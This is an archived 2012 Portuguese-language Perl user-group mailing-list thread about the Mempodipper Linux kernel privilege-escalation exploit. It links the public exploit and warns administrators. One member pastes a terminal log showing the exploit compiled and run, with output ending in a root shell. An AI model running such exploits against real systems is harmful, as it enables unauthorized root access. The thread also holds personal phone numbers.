[SP-pm] [OFF] Linux Kernel Privilege Escalation >= 2.6.39

Oscar Marques oscarbm at gmail.com
Fri Jan 27 06:18:17 PST 2012 

Testado e aprovado.
Testei a versao pra android e rolou tambem.
Vejam a thread disso no FB.
Ja ta antigo ja :)

2012/1/27 Alexei Znamensky <russoz at gmail.com>

>
> Em
>
> Linux alexeiz 2.6.38-13-generic-pae #53-Ubuntu SMP Mon Nov 28 19:41:58 UTC
> 2011 i686 i686 i386 GNU/Linux
>
> nem compila.
>
> Eu uso muito VMWare, e o suporte aos VMTools e aos módulos que compilam no
> kernel do Linux para o kernel 3.0 está quebrado (tem uns patches por aí,
> mas eu não vou compilar kernel agora), então estou usando o 2.6.38 por
> enquanto.
>
> []s,
> Russian
>
> 2012/1/27 Daniel Mantovani <daniel.oliveira.mantovani at gmail.com>
>
>> Acabei de testar na minha vps,
>>
>>
>> mantovani at mantovanilabs:~$ gcc mempodipper.c
>> mantovani at mantovanilabs:~$ ls
>> a.out  apps  mempodipper.c  Perl  perl5
>> mantovani at mantovanilabs:~$ chmod +x a.out
>> mantovani at mantovanilabs:~$ ./a.out
>> ===============================
>> =          Mempodipper        =
>> =           by zx2c4          =
>> =         Jan 21, 2012        =
>> ===============================
>>
>> [+] Ptracing su to find next instruction without reading binary.
>> [+] Creating ptrace pipe.
>> [+] Forking ptrace child.
>> [+] Waiting for ptraced child to give output on syscalls.
>> [+] Ptrace_traceme'ing process.
>> [+] Error message written. Single stepping to find address.
>> [+] Resolved call address to 0x4020b8.
>> [+] Opening socketpair.
>> [+] Waiting for transferred fd in parent.
>> [+] Executing child from child fork.
>> [+] Opening parent mem /proc/16574/mem in child.
>> [+] Sending fd 6 to parent.
>> [+] Received fd at 6.
>> [+] Assigning fd 6 to stderr.
>> [+] Calculating su padding.
>> [+] Seeking to offset 0x4020ac.
>> [+] Executing su with shellcode.
>> # uname -a
>> Linux mantovanilabs.com 3.0.4-x86_64-linode21 #1 SMP Thu Sep 1 21:28:01
>> EDT 2011 x86_64 GNU/Linux
>>
>>  --
>> Software Engineer
>> Just Another Perl Hacker
>> Daniel Mantovani +5511 8538-9897
>> XOXO
>>
>> On Jan 27, 2012, at 12:02 PM, Daniel Mantovani wrote:
>>
>>
>> http://www.techworld.com.au/article/413300/linux_vendors_rush_patch_privilege_escalation_flaw_after_root_exploits_emerge
>> o exploit, http://www.exploit-db.com/exploits/18411/
>>
>> Atencao administradores, o assunto 'e serio.
>>
>>
>> --
>> Software Engineer
>> Just Another Perl Hacker
>> Daniel Mantovani +5511 8538-9897
>> XOXO
>>
>>
>>
>> =begin disclaimer
>>   Sao Paulo Perl Mongers: http://sao-paulo.pm.org/
>>  SaoPaulo-pm mailing list: SaoPaulo-pm at pm.org
>>  L<http://mail.pm.org/mailman/listinfo/saopaulo-pm>
>> =end disclaimer
>>
>>
>
>
> --
> Alexei "RUSSOZ" Znamensky | russoz EM gmail com | http://russoz.org
> GPG fingerprint = 42AB E78C B83A AE31 7D27  1CF3 C66F B5C7 71CA 9F3C
> http://www.flickr.com/photos/alexeiz | http://github.com/russoz
> "I don't know... fly casual!" -- Han Solo
>
> =begin disclaimer
>   Sao Paulo Perl Mongers: http://sao-paulo.pm.org/
>  SaoPaulo-pm mailing list: SaoPaulo-pm at pm.org
>  L<http://mail.pm.org/mailman/listinfo/saopaulo-pm>
> =end disclaimer
>
>


-- 
Oscar Marques
oscarbm at gmail.com
http://www.dunkelheit.com.br
@f117usbr <https://twitter.com/#%21/f117usbr>
+55 21 9293-9343
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.pm.org/pipermail/saopaulo-pm/attachments/20120127/6bce073f/attachment-0001.html>

More information about the SaoPaulo-pm mailing list